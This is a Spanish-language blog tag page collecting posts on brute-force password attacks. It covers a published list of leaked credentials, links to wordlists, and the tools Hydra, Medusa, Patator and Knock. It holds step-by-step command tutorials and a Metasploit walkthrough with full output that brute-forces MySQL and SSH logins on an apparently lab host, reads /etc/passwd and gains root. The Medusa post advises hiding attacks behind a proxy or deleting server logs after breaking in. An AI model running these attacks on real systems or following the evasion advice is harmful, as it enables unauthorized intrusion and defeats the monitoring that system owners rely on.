Mostrando entradas con la etiqueta Fuerza Bruta. Mostrar todas las entradas
Mostrando entradas con la etiqueta Fuerza Bruta. Mostrar todas las entradas

10 feb. 2015

Publican 10 millones de usuarios-contraseñas en texto plano (Ten Million User:Pass ComboList TXT)


El experto en seguridad informática Mark Burnett decidió publicar 10 millones de usuarios y contraseñas en Internet en un sólo fichero de texto que expone contraseñas reales de millones de personas.

Burnett publicó esta lista que ha confeccionado a partir de diferentes bases de datos filtradas en el pasado en Internet (importantes brechas en grandes empresas como Adobe y Stratfor). Aclara que todos estos nombres de usuario y contraseñas, organizados en orden alfabético, son de ataques a sitios y que se pueden conseguir si buscas lo suficiente.

5 mar. 2013

Diccionarios para Realizar Ataques de Fuerza Bruta - Brute Forcing Word List Resources

Hace un tiempo hice una lista con Diccionarios para Realizar Ataques de Fuerza Bruta, pero algunos links ya no funcionaban y además que tengo nuevos diccionarios que les pueden interesar, sin más que decir, les dejo una recopilación bastante buena:

Crackstation.net ha realizado 2 diccionarios, uno es "pequeño" y descompreso pesa 684 MB y el otro diccionario es mucho más grande y compreso pesa 9.2 GB, descompreso pesa nada más que 15 GB.

4 ene. 2012

[Patator] Herramienta Multi-Propósito para Fuerza Bruta

Patator es una herramienta (script en python) multi-propósito para fuerza bruta, esta herramienta nace del aburrimiento del creador usando otras  herramientas para fuerza bruta conocidas como Medusa, Hydra, ncrack, módulos auxiliares de metasploit, scripts de nmap NSE y similares porque:
  • O bien no funcionan o no son fiables (falsos negativos en varias ocasiones).
  • Son lentos (no multi-threaded o no prueban múltiples contraseñas en la misma conexión TCP).
  • Carecen de características útiles que ofrece Python (por ejemplo, interactivo en tiempo de ejecución).

22 dic. 2011

[MySQL Password Auditor] Auditoría & Recuperación de Contraseñas MySQL


Desde SecurityXploded les traigo MysqlPasswordAuditor que es un programa gratuito de recuperación de contraseña de MySQL (uno de los software de bases de datos más potentes y utilizadas por la mayoría de las aplicaciones y servidores web).

MysqlPasswordAuditor ayuda a la recuperación de la contraseña de un servidor MySQL y puede ser usada para auditar bases de datos Mysql y descubrir contraseñas débiles.

MysqlPasswordAuditor es muy fácil de usar, con la simple diccionario, por fuerza bruta empieza a probar todas las contraseñas que estén en nuestro diccionario. Por defecto se incluye una lista de contraseñas de archivos pequeños, sin embargo pueden encontrar más diccionario con contraseñas aquí.

26 feb. 2011

Diccionarios Para FUERZA BRUTA! - WordList Brute Force!

Estaba de ocioso, y hace tiempo que había prometido una buena recopilación de Diccionarios Para FUERZA BRUTA, pero me encontré que en mis marcadores había una infinidad de webs con una infinidad de diccionarios, así que postear uno por uno no tenía mucho sentido, así decidí hacer un TOP 15 con los sites que mejores Diccionarios (WordLists) para Fuerza Bruta tenian, y me quedó una tablita así:

26 ene. 2011

[THC-Hydra 6.0] Nueva Versión de este Rápido y Flexible Login-Cracker

Creo que ya muchos conocen está ultra conocida herramienta y les informo que salió la versión 6.0, si quieren un pequeño tutorial de THC-Hydra visiten este link (Español):


Dentro de los cambios más importantes es que trae soporte para IPv6, y otros más que se los dejo aquí:

8 oct. 2010

[THC-Hydra] Tutorial (explicación modo de uso) + Video

Me han pedido mucho tutoriales para usar el conocido programa Hydra, y claro, existe muy poca documentación de uso del programa debido a su fácil manejo.

Bueno... THC-Hydra es un archi conocido Software que intenta crakear por fuerza bruta la contraseña de una cantidad impresionante de protocolos: TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, LDAP2, Cisco AAA (incorporado en el módulo de Telnet).

Su éxito se debe a un algoritmo que asegura ser el más eficiente (?) y rápido (?) en este tipo de ataques. Hoy en día THC-Hydra cuenta con su versión 5.8 y tiene soporte tanto para Linux (linea de comandos y GUI) y Windows (sólo como comando).

Aquí se verá un video de como crackear por fuerza bruta la contraseña de un FTP, ya sabiendo el nombre de usuario y usando un diccionario de contraseñas:




El uso básico de Hydra es:
hydra -l user -P diccionario.txt -vV 192.0.0.1 ftp

Sentencias Elementales:
  • -l Es el nombre de usuario, si se usa en mayúscula (-L) se puede poner un diccionario (*.txt) con usuarios (muy práctico cuando no se sabe el usuario) [-l admin] [-L admin.txt].
  • -p Se pone el password, si se usa en mayúscula (-P) se puede poner un diccionario de passwords (es lo más lógico usar esta opción) [-p password] [-P diccionario.txt].
  • -v Es el verbose mode que imprime en pantalla los intentos de usarios-password, si se usa con mayúscula (-V) Hydra nos dará más detalles del proceso de crackeo [-v] [-vV].
  • 192.0.0.1 Esto se remplaza por el IP de nuestro objetivo [IP/host].
  • ftp El protocolo al cual se ataca, puede ser todos los mensionados arriba (ftp, telnet, pop3, snmp, etc...) [protocolo].

Luego de eso empezaría el largo proceso de crackear una contraseña por fuerza bruta, y rezar para que el password se encuentre en el diccionario.txt o estamos perdidos.

Otras sentencias muy útiles:
  • -R esto restaura la sesión anterior que se nos haya caído (muy normal cuando nuestro pc no es muy bueno) o que hayamos abortado [-R].
  • -S se conecta por SSL [-S].
  • -s Se especifica un puerto por si no es el por defecto en el protocolo (ejemplo: telnet (23), ftp (21), smtp (25), etc...) [-s 4450].
  • -C Esta sentencia se usa eliminando -l/-L y -p/-P ya que aquí se especifica un diccionario combo, osea que tenga tanto usuario como contraseña con el formato user:pass [-C diccionario-combo.txt].
  • -o Esto es muy útil ya que nos ira dejando en un documento que nosotros especifiquemos todas las contraseñas y usuarios que vaya sacando [-o output.txt].
  • -f Se cierra Hydra después de encontrar el primer password [-f].
  • -w Con este se puede especificar el tiempo máximo (en segundos) que queramos que este crackeando passwords [-w 9999999].
  • -t Este es uno de los más útiles si es que cuentas con un computador con buenas características y buena banda ancha, ya que permite cambiar la cantidad de contraseñas/passwords que se crackean en paralelo que son 16 por defecto [-t 32].

Y nunca está demás el mejor de todos, la mejor sentencia de la mayoría de los comandos:
  • -h nos brindará la ayuda principal del comando [-h] [--help].

    Bonus: Buenos diccionarios de contraseñas.

    Web oficial de Hydra: http://freeworld.thc.org/thc-hydra/

    [+] Salu2
    [+] ZioneR

    15 jun. 2010

    Fuerza Bruta SSH



    Bueno, este es un paper hecho por Progresive Death donde explica como usar las Tools SSH Bruteforcer que se encuentra en backtrack4, Escaneo y Ataque de Fuerza Bruta hacia SSH, para poder establecer la conexión con la sesión SSH que hemos conseguido. Aquí el paper:

    Brute Ssh


    Autor:
    Progresive Death
    Fuente: http://charsecurity.blogspot.com/

    11 jun. 2010

    Intrusión a MySQL y luego obteniendo Shell Root

    Hola hoy les haré un pequeño tutorial con metasploit para hacer una intrusión a una base de datos mysql para después poder obtener shell root por ssh

    Empecemos?

    Escaneamos con NMAP los puertos:
    nmap -sV --allports --version-all 192.168.1.34
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp         ProFTPD 1.3.1
    22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    23/tcp   open  telnet      Linux telnetd
    25/tcp   open  smtp        Postfix smtpd
    53/tcp   open  domain      ISC BIND 9.4.2
    80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
    139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
    5432/tcp open  postgresql  PostgreSQL DB
    8009/tcp open  ajp13?
    8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1

    Acá lo que nos interesa:
    3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5

    Abramos metasploit
    Usaremos el auxiliary
    mysql_login
    msf > use scanner/mysql/mysql_login
    msf auxiliary(mysql_login) > show options
    
    Module options:
    
       Name              Current Setting  Required  Description
       ----              ---------------  --------  -----------
       BLANK_PASSWORDS   true             yes       Try blank passwords for all users
       BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
       PASSWORD                           no        A specific password to authenticate with
       PASS_FILE                          no        File containing passwords, one per line
       RHOSTS                             yes       The target address range or CIDR identifier
       RPORT             3306             yes       The target port
       STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
       THREADS           1                yes       The number of concurrent threads
       USERNAME                           no        A specific username to authenticate as
       USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
       USER_FILE                          no        File containing usernames, one per line
       VERBOSE           true             yes       Whether to print output for all attempts

    Agregamos el host:
    msf auxiliary(mysql_login) > set RHOSTS 192.168.1.34
    RHOSTS => 192.168.1.34

    Ahora agregamos con el user que se va a loguear yo en mi caso voy a probar con root:
    msf auxiliary(mysql_login) > set USERNAME root
    USERNAME => root

    Y ahora voy a usar la opción PASS_FILE para hacer un brute force :P al login y intentar longuearse con las contraseñas :P
    msf auxiliary(mysql_login) > set PASS_FILE /home/linuxfer/Escritorio/pass.txt
    PASS_FILE => /home/linuxfer/Escritorio/pass.txt

    Ejecutamos el axuriliary:
    msf auxiliary(mysql_login) > run
    [*] 192.168.1.34:3306 - Found remote MySQL version 5.0.51a
    [*] 192.168.1.34:3306 Trying username:'root' with password:''
    [*] 192.168.1.34:3306 failed to login as 'root' with password ''
    [*] 192.168.1.34:3306 Trying username:'root' with password:'murderking'
    [*] 192.168.1.34:3306 failed to login as 'root' with password 'murderking'
    [*] 192.168.1.34:3306 Trying username:'root' with password:'duraznin'
    [*] 192.168.1.34:3306 failed to login as 'root' with password 'duraznin'
    [*] 192.168.1.34:3306 Trying username:'root' with password:'pete'
    [*] 192.168.1.34:3306 failed to login as 'root' with password 'pete'
    [*] 192.168.1.34:3306 Trying username:'root' with password:'oxono'
    [*] 192.168.1.34:3306 failed to login as 'root' with password 'oxono'
    [*] 192.168.1.34:3306 Trying username:'root' with password:'puto'
    [*] 192.168.1.34:3306 failed to login as 'root' with password 'puto'
    [*] 192.168.1.34:3306 Trying username:'root' with password:'root'
    [+] 192.168.1.34:3306 - SUCCESSFUL LOGIN 'root' : 'root'
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf auxiliary(mysql_login) > 

    Como vemos se logueo con root root
    192.168.1.34:3306 - SUCCESSFUL LOGIN 'root' : 'root'

    Abrimos una nueva terminal y ejecutamos
    mysql -h 192.168.1.34 -u root -p root
    -h: host
    -u:usuario
    -p:password

    linuxfer@linuxfer-laptop:~$ mysql -h 192.168.1.34 -u root -proot
    Welcome to the MySQL monitor.  Commands end with ; or \g.
    Your MySQL connection id is 38
    Server version: 5.0.51a-3ubuntu5 (Ubuntu)
    
    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
    
    mysql> 

    Ya estamos dentro del server mysql
    mysql> show grants;
    +--------------------------------------------------------------------------------------------------------------------------------+
    | Grants for root@%                                                                                                              |
    +--------------------------------------------------------------------------------------------------------------------------------+
    | GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD '*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B' WITH GRANT OPTION |
    +--------------------------------------------------------------------------------------------------------------------------------+
    1 row in set (0.00 sec)

    Veamos los roots :P
    mysql> select load_file('/etc/passwd');
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    dhcp:x:101:102::/nonexistent:/bin/false
    syslog:x:102:103::/home/syslog:/bin/false
    klog:x:103:104::/home/klog:/bin/false
    sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
    msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
    bind:x:105:113::/var/cache/bind:/bin/false
    postfix:x:106:115::/var/spool/postfix:/bin/false
    ftp:x:107:65534::/home/ftp:/bin/false
    postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
    tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
    distccd:x:111:65534::/:/bin/false
    user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
    service:x:1002:1002:,,,:/home/service:/bin/bash
    telnetd:x:112:120::/nonexistent:/bin/false
    proftpd:x:113:65534::/var/run/proftpd:/bin/false

    Mmmmmm.. parece que el usuario es msfadmin volvamos a metasploit ahora usaremos el auxiliary
    scanner/ssh/ssh_login
    msf auxiliary(mysql_login) > use scanner/ssh/ssh_login
    msf auxiliary(ssh_login) > show options
    
    Module options:
    
       Name              Current Setting  Required  Description
       ----              ---------------  --------  -----------
       BLANK_PASSWORDS   true             yes       Try blank passwords for all users
       BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
       PASSWORD                           no        A specific password to authenticate with
       PASS_FILE                          no        File containing passwords, one per line
       RHOSTS                             yes       The target address range or CIDR identifier
       RPORT             22               yes       The target port
       STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
       THREADS           1                yes       The number of concurrent threads
       USERNAME                           no        A specific username to authenticate as
       USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
       USER_FILE                          no        File containing usernames, one per line
       VERBOSE           true             yes       Whether to print output for all attempts

    Agregamos host:
    msf auxiliary(ssh_login) > set RHOSTS 192.168.1.34
    RHOSTS => 192.168.1.34

    Agregamos el user:
    msf auxiliary(ssh_login) > set USERNAME msfadmin
    USERNAME => msfadmin

    Agregamos las pass con las que queremos que haga el brute force
    msf auxiliary(ssh_login) > set PASS_FILE /home/linuxfer/Escritorio/pass2.txt
    PASS_FILE => /home/linuxfer/Escritorio/pass2.txt

    Ejecutamos el auxiliary:
    msf auxiliary(ssh_login) > run
    
    [*] 192.168.1.34:22 - SSH - Starting buteforce
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: ''
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':''
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'jaja'
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'jaja'
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'pete'
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'pete'
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'tutorial'
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'tutorial'
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'ddlr'
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'ddlr'
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'pam'
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'pam'
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'paquero'
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'paquero'
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'duraznin'
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'duraznin'
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'msfadmin'
    [*] Command shell session 1 opened (192.168.1.33:58907 -> 192.168.1.34:22) at Thu Jun 10 17:55:19 -0300 2010
    [+] 192.168.1.34:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    Que tal se logueo con msfadmin y msfadmin:
    *] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'msfadmin'
    [*] Command shell session 1 opened (192.168.1.33:58907 -> 192.168.1.34:22) at Thu Jun 10 17:55:19 -0300 2010
    [+] 192.168.1.34:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '

    Bueno ya esta creada la sessión con la shell veamos:
    Active sessions
    ===============
    
      Id  Type   Information                              Connection
      --  ----   -----------                              ----------
      1   shell  SSH msfadmin:msfadmin (192.168.1.34:22)  192.168.1.33:58907 -> 192.168.1.34:22
    msf auxiliary(ssh_login) > sessions -i 1
    [*] Starting interaction with 1...
    
    id
    uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
    pwd
    /home/msfadmin
    uname -a
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

    Bien ahora abramos una nueva terminal y conectemosno por ssh para obtener shell root
    linuxfer@linuxfer-laptop:~$ ssh msfadmin@192.168.1.34
    The authenticity of host '192.168.1.34 (192.168.1.34)' can't be established.
    RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '192.168.1.34' (RSA) to the list of known hosts.
    msfadmin@192.168.1.34's password: 

    Nos pide pass recuerden que es msfadmin tipeamos y
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
    
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    
    To access official Ubuntu documentation, please visit:
    http://help.ubuntu.com/
    No mail.
    Last login: Thu Jun 10 15:15:54 2010
    msfadmin@metasploitable:~$ 

    Ya tenemos shell ahora solo tenemos que tipear sudo -i la pass msfadmin y ya tenemos shell root
    msfadmin@metasploitable:~$ sudo -i
    [sudo] password for msfadmin: 
    root@metasploitable:~# id
    root@metasploitable:~# id
    uid=0(root) gid=0(root) groups=0(root)
    root@metasploitable:~# 

    Game over (?)

    Bueno espero que les halla gustado y hallan entendido bien perdon por no hacer un video pero es que tengo unos problemillas :P


    Autor: linuxfer
    Fuente: http://linuxfer.diosdelared.com/

    9 jun. 2010

    [Knock v1.3b] Enumeración de Subdominios (Fuerza Bruta)

    Knock es un script diseñado en python para enumerar subdominios de una host (web) con una wordlist.

    Modo de uso:
    $ python knock.py [ url ] [ wordlist ]

    Video demostrando el uso de Knock en facebook:


    Knock trabaja en Linux, Windows y MAC OSX con versiones de python 2.6.x (o menor).

    Requerimientos:
    • Python versión 2.6.x o menor.
    • Una wordlist. 

    Binario para Windows
    Package para Linux


    Leer más aquí.

    Fuente: http://www.darknet.org.uk

    9 mar. 2010

    [Medusa] Ataque de fuerza bruta con diccionario

    Seguramente muchos conocen  hydra: una aplicacion para atacar con fuerza bruta  usando diccionarios,  a diferentes servicios como: ssh, ftp,  mysql entre otros,  sin embargo hydra  no se volvió actualizar, su ultima versión fue  lanzada en el 2006 y aunque todavía funciona muy bien,   tiene muchos problemas en la instalación, debido a las dependencias y sus versiones.

    No obstante, existe una aplicacion llamada  medusa que es muy similar ( no exactamente igual) a hydra, la cual nos permite crackear por diccionario de forma rápida, masiva y paralela  los siguientes servicios:
    • AFP
    • CVS
    • FTP
    • HTTP
    • IMAP
    • MS-SQL
    • MySQL
    • NetWare NCP
    • NNTP
    • PcAnywhere
    • POP3
    • PostgreSQL
    • REXEC
    • RLOGIN
    • RSH
    • SMBNT
    • SMTP-AUTH
    • SMTP-VRFY
    • SNMP
    • SSHv2
    • Subversion (SVN)
    • Telnet
    • VMware autenticación Daemon (vmauthd)
    • VNC
    • Genérico Wrapper
    • Web Form
    Algunas de las caracteristicas que nos tiene medusa son:
    • Velocidad
    • Estabilidad
    • Organizacion del código, para comprenderlo facil
    • diversidad de servicios (como vieron anteriormente)

    Instalación de  Medusa

    Antes de instalar  medusa, debemos revisar  que se cumplan las siguientes dependencias:
    • OpenSSL
    • LibSSH2
    • NCPFS
    • Libpq
    • Subversion
    • afpfs-ng
    Para los usuarios de debian, esta herramienta se encuentra en los repositorios:
    apt-get install medusa

    Para los demás usuarios descargan las fuentes desde aca, y compilan:
    ./configure
    make
    make install

    ¿Como crackear password con diccionarios usando medusa ?

    Lo primero que debemos hacer es  ver los módulos disponibles,  los módulos son los servicios los cuales podemos atacar, para visualizar los módulos:
    medusa -d

    Después de estar seguros de que tenemos el modulo adecuado al servicio que deseamos atacar, procedemos a lanzar el ataque. Medusa posee una gran cantidad de parámetros (ojala se tomaran el tiempo para leer el man  con detenimiento).  Los parámetros mas importantes son:
    -h -> el host víctima
    -H -> si tenemos un archivo txt con una lista de hosts
    -u  -> el usuario al cual deseamos hacerle el cracking
    -U ->  un archivo txt con la lista de posibles usuarios (muy útil si no sabemos que usuarios existen en el sistema)
    -P ->  Ubicación del diccionario
    -O  -> Crea un archivo log
    - e  ns -> Verifica el password vacio o que ambos datos sean lo mismo
    -M  -> El modulo que deseamos emplear (sin la extension .mod)
    -n -> por si el servicio esta corriendo en otro puerto diferente al default
    -s -> Habilita ssl
    -f -> detiene el ataque en el instante de encontrar un password valido
    -b -> suprime los banners
    -v  -> modo verbose (mas informacion level de 0 a 6 siendo el 6 mas alto)

    Ahora practiquemos un poco:
    medusa -h 127.0.0.1 -u rincon -P /diccionario.txt -M mysql -L -f -b -v 6

    Como pueden ver me estoy atacando yo  mismo obviamente me he asegurado que el password se encuentra en el diccionario, el resultado es sorprendente tardo muy poco (10 segundos aproximadamente), el tiempo depende de varios factores como el tamaño del diccionarios y la ubicacion del password encontrado, ya que se va a demorar mucho menos si el password esta al inicio del diccionario de 36000 palabras.

    Ahora muchos diran que no es lo mismo hacer un ataque de fuerza bruta con diccionario de forma local  que de forma remota y tienen mucha razon, sin embargo hicimos  la prueba de forma remota  y los resultados fueron muy aceptables, se demoro 6 minutos en encontrar el password en un diccionario de 500 palabras (con esos datos ya pueden hacer la simple regla de 3) atacando  el ssh

    Algunos inconvenientes

    Todo no es color de rosa, existen algunos inconvenientes que debemos tener en cuenta antes de realizar un ataque de este tipo:
    • No  hay total certeza de encontrar el password, sin embargo la efectividad de un ataque con diccionario es directamente proporcional al tamaño del diccionario, es decir, entre mas grande sea el diccionario mayor sera la probabilidad de  encontrar la contraseña.
    • Otro inconveniente, consiste en que algunos sysadmin inteligentes restringen  el numero de intentos de autenticacion a un numero no mayor a 3, asi que si nos topamos con un servidor serio, no podremos aplicar el ataque por fuerza bruta.
    • Cuando nos encontramos un servidor “vulnerable” a un ataque de fuerza bruta con diccionario, debemos tener muchisimo cuidado, ya que un ataque de esta naturaleza  hace demasiado “RUIDO” es decir, todos los intentos de conexion quedaran guardados en los logs del servidor, por eso es pertinente usar un proxy para hacer el ataque, o  en su defecto borrar los logs, inmediatamente despues de entrar al server.
    Fuente: http://www.rinconinformatico.net/